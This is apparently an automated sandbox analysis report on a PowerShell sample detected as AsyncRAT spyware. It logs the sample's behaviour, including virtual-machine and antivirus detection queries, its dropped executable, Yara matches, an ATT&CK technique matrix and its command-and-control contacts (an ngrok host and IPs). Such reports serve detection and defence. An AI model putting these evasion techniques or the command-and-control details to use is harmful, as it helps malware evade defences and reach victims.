              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeMemory allocated: 1650000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeMemory allocated: 1B190000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3037Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2782Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWindow / User API: threadDelayed 5953Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWindow / User API: threadDelayed 3861Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7924Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7876Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe TID: 8012Thread sleep time: -12912720851596678s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe TID: 8024Thread sleep count: 5953 > 30Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe TID: 8024Thread sleep count: 3861 > 30Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: tmpB20E.exe, 00000004.00000002.3782953971.0000000001525000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0.W
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeMemory allocated: page read and write | page guardJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\tmpB20E.exe "C:\Users\user\AppData\Local\Temp\tmpB20E.exe" Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmpB20E.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: tmpB20E.exe, 00000004.00000002.3792376298.000000001BFDA000.00000004.00000020.00020000.00000000.sdmp, tmpB20E.exe, 00000004.00000002.3782953971.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, tmpB20E.exe, 00000004.00000002.3782953971.0000000001525000.00000004.00000020.00020000.00000000.sdmp, tmpB20E.exe, 00000004.00000002.3792376298.000000001BF70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 4.0.tmpB20E.exe.f10000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.powershell.exe.1e40029eb40.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.powershell.exe.1e40029eb40.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000000.1350762891.0000000000F12000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1351823605.000001E400232000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7700, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: tmpB20E.exe PID: 7928, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe, type: DROPPED

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 4.0.tmpB20E.exe.f10000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.powershell.exe.1e40029eb40.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.powershell.exe.1e40029eb40.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000000.1350762891.0000000000F12000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1351823605.000001E400232000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7700, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: tmpB20E.exe PID: 7928, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
              Windows Management Instrumentation              		1
              DLL Side-Loading              		11
              Process Injection              		1
              Disable or Modify Tools              		OS Credential Dumping221
              Security Software Discovery              		Remote Services11
              Archive Collected Data              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		131
              Virtualization/Sandbox Evasion              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Process Injection              		Security Account Manager131
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Deobfuscate/Decode Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture1
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Obfuscated Files or Information              		LSA Secrets2
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Software Packing              		Cached Domain Credentials13
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1602905 Sample: 20f8b1d9eabf499dbc7a0bff6ee... Startdate: 30/01/2025 Architecture: WINDOWS Score: 100 19 2.tcp.eu.ngrok.io 2->19 21 171.39.242.20.in-addr.arpa 2->21 29 Suricata IDS alerts for network traffic 2->29 31 Malicious sample detected (through community Yara rule) 2->31 33 Multi AV Scanner detection for submitted file 2->33 35 6 other signatures 2->35 7 powershell.exe 17 2->7         started        signatures3 process4 file5 17 C:\Users\user\AppData\Local\...\tmpB20E.exe, PE32 7->17 dropped 37 Found suspicious powershell code related to unpacking or dynamic code loading 7->37 39 Powershell drops PE file 7->39 11 tmpB20E.exe 2 7->11         started        15 conhost.exe 7->15         started        signatures6 process7 dnsIp8 23 3.127.138.57, 10901, 57576, 57605 AMAZON-02US United States 11->23 25 18.157.68.73, 10901, 57656, 57657 AMAZON-02US United States 11->25 27 3 other IPs or domains 11->27 41 Antivirus detection for dropped file 11->41 43 Multi AV Scanner detection for dropped file 11->43 45 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 11->45 47 Machine Learning detection for dropped file 11->47 signatures9

              Screenshots

              Download Video

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              20f8b1d9eabf499dbc7a0bff6ee7ddec.ps122%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\tmpB20E.exe100%AviraHEUR/AGEN.1305769
              C:\Users\user\AppData\Local\Temp\tmpB20E.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\tmpB20E.exe72%VirustotalBrowse

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Download Network PCAP: filteredfull

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              2.tcp.eu.ngrok.io
              		3.126.37.18
              		truefalse
                		high
                171.39.242.20.in-addr.arpa
                		unknown
                		unknownfalse
                  		high
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1368287437.000001E4101E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1368287437.000001E410081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1351823605.000001E401B96000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000001.00000002.1351823605.000001E401646000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1351823605.000001E401A4E000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1351823605.000001E401A4E000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://contoso.com/powershell.exe, 00000001.00000002.1351823605.000001E401B96000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1368287437.000001E4101E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1368287437.000001E410081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1351823605.000001E401B96000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://contoso.com/Licensepowershell.exe, 00000001.00000002.1351823605.000001E401B96000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://contoso.com/Iconpowershell.exe, 00000001.00000002.1351823605.000001E401B96000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
